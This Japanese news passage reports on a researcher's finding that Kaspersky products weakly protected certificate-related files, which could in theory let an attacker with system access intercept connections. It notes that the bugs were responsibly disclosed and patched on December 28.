     Ormandyは、Kaspersky製品が、これらの重要なファイルを保護するために脆弱なメカニズムを使用していたと発言している。
     この研究者は、理論的には、システムへのアクセスを持つ攻撃者が、秘密鍵を変更し、信頼される認証局となり、HTTP接続をインターセプトしたり開始したりするために使用することのできるSSL認証をユーザのマシン上に配備することが可能であると、発言している。
     この二つのバグは、この秋Kasperskyのスタッフに適切に報告された。この企業は12月28日に両方のバグに関するアップデートを公開した。Kasperskyアンチウィルス ソフトウェアのユーザは必ず最新のアップデートを実行しなければならない。